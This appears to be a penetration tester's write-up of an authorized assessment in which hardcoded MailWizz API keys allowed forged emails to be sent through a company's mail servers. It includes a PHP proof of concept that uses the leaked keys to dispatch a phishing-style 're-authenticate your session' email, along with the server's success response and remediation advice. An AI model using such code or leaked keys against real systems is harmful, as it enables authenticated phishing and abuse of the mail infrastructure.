July 14, 2026
Infrastructure Takeover: How Leaked MailWizz API Keys Allowed Bypass of Corporate Email Boundaries
Executive Summary

By M0stafaX404
2 min read
Executive Summary
During an authorized security assessment, a critical infrastructure information disclosure vulnerability was validated. The flaw involves the exposure of hardcoded production API credentials for the MailWizz transactional email engine. While initial testing against standard subscription endpoints showed zero record exposure, deeper architectural analysis and dynamic pivoting proved that an unauthenticated external actor could weaponize these keys. By interacting directly with the transactional mail utility, it was possible to forge and transmit highly authenticated corporate emails directly through the official corporate mail servers, entirely bypassing security perimeters.
- Vulnerability Type: Critical Infrastructure Information Disclosure / Hardcoded Credentials (CWE-798).
- Severity: Critical (CVSS v3.1 Score: 9.8/10).
- Target Domain Affected:
srp.target-app.com&sendmail.target-app.com.
Assessment Context
- Target Type: Private Enterprise Mail & Web Infrastructure (Internal Audit).
- Engagement Type: Authorized Internal Penetration Testing (White-box Verification).
- Disclosure Status: Responsibly Disclosed & Fully Remediated by the Internal Dev Team.
- Bounty/Reward: Internal Pentesting Engagement (Corporate Payroll), Non-HackerOne.
Phase 1: Key Discovery & Analytical Pivoting
The assessment initiated following a source code analysis where static, hardcoded MailWizz API credentials (including the API URL, Public Key, and Private Key) were discovered inside the production framework config files.
To measure the real-world impact, a standalone PHP environment script (mail.php) was built using the official MailWizz SDK dependencies.
The Initial Roadblock (Phase A):
Initial execution targeted the standard subscriber endpoint: MailWizzApi_Endpoint_Lists::getLists(). The production server responded with:
{ "status": "success", "records": [] }{ "status": "success", "records": [] }The empty record array initially suggested that the exposed keys lacked actionable risk profile data because no subscriber lists were mapped.
The Pivot (Phase B):
Instead of halting investigation, the testing scope shifted to analyze if the backend infrastructure utilized a direct transactional mail routing architecture. The integration script was modified to target the transactional interface endpoint: MailWizzApi_Endpoint_TransactionalEmails().
Phase 2: Proof-of-Concept & Verification Code
A structured testing payload was engineered to invoke the server-side create() method, pointing toward an external controlled email box:
// Automated Transactional Email Dispatch via Leaked API Keys
$config = new MailWizzApi_Config([
'apiUrl' => 'http://sendmail.target-app.com/api/index.php',
'publicKey' => '1b42151f0d7e9ee88463b5c8a30e87a1fe9aa250',
'privateKey' => '9d6bcb78f6393c48a04266b1291c1ffb01077664',
]);
MailWizzApi_Base::setConfig($config);
$endpoint = new MailWizzApi_Endpoint_TransactionalEmails();
$response = $endpoint->create([
'to_name' => 'Test Target',
'from_name' => 'E-Signature Admin',
'to_email' => 'target@controlled-domain.com',
'subject' => 'Critical Account Security Update',
'body' => '<h1>Action Required</h1><p>Please re-authenticate your session.</p>',
'send_at' => date('Y-m-d H:i:s'),
]);// Automated Transactional Email Dispatch via Leaked API Keys
$config = new MailWizzApi_Config([
'apiUrl' => 'http://sendmail.target-app.com/api/index.php',
'publicKey' => '1b42151f0d7e9ee88463b5c8a30e87a1fe9aa250',
'privateKey' => '9d6bcb78f6393c48a04266b1291c1ffb01077664',
]);
MailWizzApi_Base::setConfig($config);
$endpoint = new MailWizzApi_Endpoint_TransactionalEmails();
$response = $endpoint->create([
'to_name' => 'Test Target',
'from_name' => 'E-Signature Admin',
'to_email' => 'target@controlled-domain.com',
'subject' => 'Critical Account Security Update',
'body' => '<h1>Action Required</h1><p>Please re-authenticate your session.</p>',
'send_at' => date('Y-m-d H:i:s'),
]);Production Server Acceptance:
The core mail infrastructure accepted the unauthenticated payload instantly without validating session cookies or dashboard access tokens. The server returned a legitimate tracking transaction UID:
JSON
{
"status": "success",
"email_uid": "ck687txj5a064"
}{
"status": "success",
"email_uid": "ck687txj5a064"
}
Real-World Business & Technical Impact
Weaponizing these exposed infrastructure parameters expands the exploit threat landscape significantly:
- High-Fidelity Corporate Phishing (BEC/Whaling): Because the dispatched emails originate directly from the company's legitimate infrastructure, they automatically possess valid cryptographic domain alignments, passing SPF, DKIM, and DMARC authentication filters. An attacker could impersonate executive management or dispatch malicious links, achieving a near 100% target infiltration success rate.
- Domain Reputation Ruin & Blanket Blacklisting: Attackers could abuse the open API endpoints to stream millions of automated malicious spam messages. Consequently, global security providers (like Google Workspace, Microsoft 365, or Spamhaus) would universally blacklist the main root corporate domains, completely crippling legitimate day-to-day enterprise email communication.
- Resource Exhaustion and Financial Liability: High-volume volume bursts run down server operational throughput and deplete metered third-party billing allocations, blocking authentic OTP delivery or service confirmation sheets from reaching real customers.
Immediate Remediation Controls
Securing the messaging architecture required applying strict defense-in-depth controls:
- Revoke and Invalidate Compromised Secrets: Instantly access the MailWizz administration control dashboard and purge the leaked public/private token pairs to neutralize external ongoing script access.
- Environment Variable Decoupling: Completely remove configuration strings from server controllers. Migrate sensitive keys into an isolated environment file (
.env) locked down outside public web root spaces. - IP Address Whitelisting Policies: Inside the API console panel, bind token execution restrictions exclusively to the static, trusted public IP addresses of core corporate application servers.
Disclaimer & Contact
This security assessment was conducted legally with prior authorization and written permission from the target organization. All sensitive details, identifiers, and company names have been strictly obfuscated for confidentiality and privacy compliance.